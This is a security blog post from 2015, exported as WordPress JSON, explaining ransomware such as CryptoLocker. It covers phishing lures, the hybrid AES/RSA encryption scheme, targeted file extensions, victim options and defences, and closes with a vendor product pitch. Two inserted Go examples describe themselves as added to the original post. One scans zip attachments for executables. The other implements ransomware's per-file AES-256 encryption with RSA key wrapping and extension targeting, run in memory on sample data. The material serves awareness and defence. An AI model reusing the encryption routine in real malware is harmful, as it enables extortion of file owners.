{"id":470,"date":"2015-08-16T18:33:47","date_gmt":"2015-08-16T15:33:47","guid":{"rendered":"https:\/\/furkansandal.com\/trend-tehdit-fidye-yazilimlari-ransomware\/"},"modified":"2015-08-16T18:33:47","modified_gmt":"2015-08-16T15:33:47","slug":"trend-tehdit-fidye-yazilimlari-ransomware","status":"publish","type":"post","link":"https:\/\/furkansandal.com\/trend-tehdit-fidye-yazilimlari-ransomware\/","title":{"rendered":"Trending Threat: Ransomware"},"content":{"rendered":"

"Ransomware" is a term we have started to hear in almost every medium. In this short article we look at what ransomware is, how it affects us, and what precautions we can take.

What is ransomware?

In its shortest and most basic sense the term can be summarised as "software that demands a ransom". The best-known example is CryptoLocker, but there are many similar families: TorrentLocker, TeslaCrypt and PGPLocker are less famous relatives. There are also localised variants: in Australia, an e-mail claiming a fine from a traffic camera; in Turkey, the CryptoLocker look-alikes we frequently see claiming to come from TTnet, then Turkcell and most recently PTT Kargo.


History

This attack method already existed in the 1990s but was not widespread. As Internet speeds grew and the information flowing over the Internet became valuable (worth money), it gradually gained popularity, and the end point of that evolution is "ransomware". In the years before the name existed we handled many reports of this attack carried out "manually", that is, by the attacker in person: having broken into a server or client through an existing software or operating-system vulnerability, the attacker encrypted every file found (SQL Server databases, MS Office documents and the like) with TrueCrypt or a similar encryption tool and demanded money from the victim. Usually the victim paid and received the passphrase. But we also saw, quite often, cases where the attacker could never be contacted, or where the amount named in the note was paid and the encrypted files were still never recovered.


How does it work?

This is not a technical analysis, but it is worth touching briefly on how ransomware operates.



Like most threat types, ransomware tries to trap users via e-mail. It should be said, though, that these campaigns carry some of the most convincing e-mail content we have seen: never mind end users, even many IT professionals open the message and fall into the trap. The screenshot below shows a ransomware (CryptoLocker) attack that reached us.


[Figure: example of a CryptoLocker attack e-mail]
As you can clearly see, unlike earlier threats of this kind it is written in perfectly fluent Turkish. The date quoted in the message matches the date the e-mail arrived, and together with its official tone this makes it a highly effective phishing attack.

Each ransomware version uses a different pretext to get the user to load the malicious file onto their computer. In the example above the victim is asked to fill in an "address change form", which is what runs the malware. The address change form is of course a .zip file, and inside it sits an .exe.
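The attachment pattern just described (an archive whose only "form" is an executable) is something a mail gateway or a scripted quarantine check can catch before the message reaches a user. The following Go program is an added example written for this article, not code from the original post: it constructs a small zip in memory that mimics the lure, then flags every archive entry whose name ends in an executable extension, including double extensions such as form.pdf.exe that rely on Windows hiding the real extension. The extension list and the entry names are assumptions made for the demonstration.

```go
package main

import (
	"archive/zip"
	"bytes"
	"fmt"
	"path"
	"strings"
)

// Extensions Windows runs directly when double-clicked. Assumption: an
// illustrative set, not an exhaustive one.
var executableExts = map[string]bool{
	".exe": true, ".scr": true, ".com": true, ".pif": true, ".bat": true,
	".cmd": true, ".js": true, ".vbs": true, ".jar": true,
}

// Finding describes one suspicious entry inside an archive.
type Finding struct {
	Name   string
	Reason string
}

// inspectZip reads an archive held in memory and reports entries that are
// executables, including "double extension" names such as form.pdf.exe.
func inspectZip(data []byte) ([]Finding, error) {
	r, err := zip.NewReader(bytes.NewReader(data), int64(len(data)))
	if err != nil {
		return nil, err
	}
	var findings []Finding
	for _, f := range r.File {
		name := strings.ToLower(path.Base(f.Name))
		ext := path.Ext(name)
		if !executableExts[ext] {
			continue
		}
		reason := "executable inside archive"
		if inner := path.Ext(strings.TrimSuffix(name, ext)); inner != "" && !executableExts[inner] {
			reason = "executable disguised with double extension " + inner + ext
		}
		findings = append(findings, Finding{Name: f.Name, Reason: reason})
	}
	return findings, nil
}

// buildSampleZip constructs, in memory, an archive shaped like the lure in
// the article: an "address change form" that is really an .exe.
func buildSampleZip() []byte {
	var buf bytes.Buffer
	w := zip.NewWriter(&buf)
	entries := map[string][]byte{ // constructed sample data, not a real payload
		"Adres Degisikligi Formu.pdf.exe": []byte("MZ... constructed, not a real PE"),
		"README.txt":                       []byte("please open the form"),
	}
	for name, body := range entries {
		fw, err := w.Create(name)
		if err != nil {
			panic(err)
		}
		fw.Write(body)
	}
	if err := w.Close(); err != nil {
		panic(err)
	}
	return buf.Bytes()
}

func main() {
	findings, err := inspectZip(buildSampleZip())
	if err != nil {
		panic(err)
	}
	for _, f := range findings {
		fmt.Printf("BLOCK %q: %s\n", f.Name, f.Reason)
	}
}
```

Matching on the entry name is deliberately cheap: it does not need to read the entry body, so it works on attachments of any size and on archives that are password-protected, which is a common trick for getting past gateway antivirus.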

When this .exe runs it connects to an algorithmically generated URL (the command-and-control server) and downloads an RSA public key. It then generates a fresh AES-256 key for each file, encrypts the file with that key, and encrypts the AES key itself with the RSA public key; the private half of the RSA pair never leaves the attacker's server. Because the keys are generated separately on every computer, a decryption key bought by one victim is useless to any other. Meanwhile it changes your Windows wallpaper to announce that all of your files have been encrypted and will not open unless you pay. You are given 72 hours to pay; if you miss that window, the price goes up.

Which of my files are at risk?
The extensions most commonly used and most likely to hold your personal or corporate data are encrypted by CryptoLocker: *.odt, *.ods, *.odp, *.odm, *.odc, *.odb, *.doc, *.docx, *.docm, *.wps, *.xls, *.xlsx, *.xlsm, *.xlsb, *.xlk, *.ppt, *.pptx, *.pptm, *.mdb, *.accdb, *.pst, *.dwg, *.dxf, *.dxg, *.wpd, *.rtf, *.wb2, *.mdf, *.dbf, *.psd, *.pdd, *.pdf, *.eps, *.ai, *.indd, *.cdr, *.jpg, *.jpe, *.dng, *.3fr, *.arw, *.srf, *.sr2, *.bay, *.crw, *.cr2, *.dcr, *.kdc, *.erf, *.mef, *.mrw, *.nef, *.nrw, *.orf, *.raf, *.raw, *.rwl, *.rw2, *.r3d, *.ptx, *.pef, *.srw, *.x3f, *.der, *.cer, *.crt, *.pem, *.pfx, *.p12, *.p7b, *.p7c. Note that the last group (.der through .p7c) are certificate and private-key files, so credentials are at risk as well as documents and images. The list may shrink or grow from one version to the next.
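To make the key handling described above concrete, here is an added Go example, not code from the original post or from any ransomware family: it implements the envelope scheme the text describes (a fresh AES-256 key per file, wrapped with the operator's RSA public key) against a few constructed in-memory files filtered by a subset of the extension list, and then shows why the victim's copy of the data is unrecoverable: decryption works only with the RSA private key, which in a real attack never leaves the command-and-control server. The file names, contents and the reduced extension set are assumptions made for the demonstration, and nothing is written to disk.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"fmt"
	"path"
	"strings"
)

// targetedExts is an assumed subset of the extension list above.
var targetedExts = map[string]bool{
	".doc": true, ".docx": true, ".xls": true, ".xlsx": true, ".pdf": true,
	".jpg": true, ".psd": true, ".dwg": true, ".pst": true, ".pem": true,
}

// File is a constructed in-memory victim file; nothing here touches disk.
type File struct {
	Name string
	Data []byte
}

// EncryptedFile: body sealed under a per-file AES-256-GCM key, and that key
// wrapped with the operator's RSA public key. The plaintext key is discarded.
type EncryptedFile struct {
	Name       string
	Nonce      []byte
	Ciphertext []byte
	WrappedKey []byte
}

func isTargeted(name string) bool {
	return targetedExts[strings.ToLower(path.Ext(name))]
}

func newGCM(key []byte) (cipher.AEAD, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// encryptFiles follows the flow in the text: a fresh AES-256 key per targeted
// file, wrapped with RSA-OAEP under the public key fetched from the C2.
func encryptFiles(pub *rsa.PublicKey, files []File) ([]EncryptedFile, error) {
	var out []EncryptedFile
	for _, f := range files {
		if !isTargeted(f.Name) {
			continue
		}
		fileKey := make([]byte, 32) // 32 bytes = AES-256
		rand.Read(fileKey)           // crypto/rand.Read never returns an error in current Go
		gcm, err := newGCM(fileKey)
		if err != nil {
			return nil, err
		}
		nonce := make([]byte, gcm.NonceSize())
		rand.Read(nonce)
		// The file name is bound as associated data, so a renamed blob will not open.
		ct := gcm.Seal(nil, nonce, f.Data, []byte(f.Name))
		wrapped, err := rsa.EncryptOAEP(sha256.New(), rand.Reader, pub, fileKey, nil)
		if err != nil {
			return nil, err
		}
		out = append(out, EncryptedFile{f.Name, nonce, ct, wrapped})
	}
	return out, nil
}

// decryptFile is what any "decryptor" handed to the victim must do; without
// the matching RSA private key the unwrap fails and the file stays sealed.
func decryptFile(priv *rsa.PrivateKey, ef EncryptedFile) ([]byte, error) {
	fileKey, err := rsa.DecryptOAEP(sha256.New(), rand.Reader, priv, ef.WrappedKey, nil)
	if err != nil {
		return nil, fmt.Errorf("cannot unwrap file key, not the operator's private key: %w", err)
	}
	gcm, err := newGCM(fileKey)
	if err != nil {
		return nil, err
	}
	return gcm.Open(nil, ef.Nonce, ef.Ciphertext, []byte(ef.Name))
}

func main() {
	operator, _ := rsa.GenerateKey(rand.Reader, 2048) // private half stays on the C2
	files := []File{ // constructed sample data
		{"report.docx", []byte("quarterly numbers")},
		{"holiday.JPG", []byte("jpeg bytes")},
		{"notes.txt", []byte("not on the list")},
	}
	enc, err := encryptFiles(&operator.PublicKey, files)
	if err != nil {
		panic(err)
	}
	bystander, _ := rsa.GenerateKey(rand.Reader, 2048)
	_, err = decryptFile(bystander, enc[0])
	fmt.Println("with some other private key:", err)
	pt, _ := decryptFile(operator, enc[0])
	fmt.Printf("with the operator's private key: %q\n", pt)
}
```

The point for a defender is in the last two calls: the wrapped file key is all that remains on the victim's machine, and unwrapping it requires the private half of a 2048-bit RSA pair that was never present there. That is why the only technical recovery paths are a backup made before infection or a private key obtained from the operators themselves.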

What do I do if I become a victim?
If you have been hit by this attack and are now in the victim's seat, you have two choices:
a) Pay, receive the key, and carry on with your life (with no guarantee, as the history above shows, that a working key will actually arrive).
b) Accept the data loss, format the computer (or restore from a backup the malware could not reach) and carry on.

To be clear: decrypting these files without the key is mathematically possible in principle, but brute-forcing an AES-256 key would take centuries, so in practice it is not possible.

What about paying and using the payment to trap those demanding money from us? Unfortunately that is not really possible either: ransomware payments are made in Bitcoin, which makes tracing the payment back to a person impractical. Some earlier variants could be undone, either because of flaws in how they implemented their encryption or because the operators' key database was seized, and some security firms even offered free decryption services. With the current generation of CryptoLocker that is no longer the case, so it is wise to be sceptical of anyone offering, for a fee, to open your files.

How can I protect myself from ransomware?
Unfortunately there is no 100% safe technical defence against ransomware. As with every threat type, awareness is the most important weapon. But frequent backups can bring the damage of a ransomware attack down to almost nothing: if you have a backup procedure that runs daily, the encryption of your files stops mattering. Remember, though, that cloud storage mounted into the operating system, such as Google Drive or Dropbox, can be hit by ransomware as well, because to the malware it is simply another writable folder.

Individual measures
If you have a licensed antivirus product, do not neglect to update it frequently. Even if they do not catch a new ransomware strain on day zero (the day it first appears), antivirus engines do pick it up after a while. The most important individual measure is awareness. Knowing that PTT never sends notifications by e-mail, and treating any e-mail that claims to contain a TTnet bill with care, are precautions that only the individual can take.

Corporate measures
On the corporate side things are more serious and more complicated.
The web-filtering systems built into firewalls unfortunately fall short. Blocking the URL that the downloaded .exe tries to reach (the command-and-control server) looks like a solution in theory, but firewalls learn about these sites only after a few days, sometimes a few weeks. Since this malware does all the damage it can within a few days, firewalls and web filters are definitely not a solution on their own.

Only a very limited number of large companies in Turkey can afford the rather expensive foreign products, and even those products come with no guarantee of being 100% effective.

Like every threat, ransomware will of course have a shelf life, but for as long as it lasts we must know it, take precautions, understand how it works on both the end-user and the corporate side, and develop new technologies to stop it.

At ISR Bilgi Güvenliği we have long been aware of the gap in Turkey and worldwide on ransomware and similar threats, and our R&D work on the subject continues at full speed within Tübitak - Martek. That work is now bearing fruit. The product we will launch shortly uses a technology quite different from static-signature approaches (UTM, firewall, IDS, IPS) and focuses on detecting and stopping these attacks while they are still zero-day. Having performed above our expectations in pilot deployments, we have no doubt that our product will very soon be a technology exported from Turkey.

You can follow all news about the product at www.isr.com.tr.

Furkan SANDAL\n","protected":false},"excerpt":{"rendered":"

"Ransomware" is a term we have started to hear in almost every medium. In this short article we look at what ransomware is, how it affects us, and what…\n","protected":false},"author":1,"featured_media":471,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_mi_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","footnotes":""},"categories":[6,1,9,10,7,4],"tags":[],"aioseo_notices":[],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/furkansandal.com\/wp-content\/uploads\/2015\/08\/Dark-Root.jpg?fit=1280%2C800&ssl=1","jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/p6BM7I-7A","amp_enabled":true,"_links":{"self":[{"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/posts\/470"}],"collection":[{"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/comments?post=470"}],"version-history":[{"count":0,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/posts\/470\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/media\/471"}],"wp:attachment":[{"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/media?parent=470"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/categories?post=470"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/tags?post=470"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}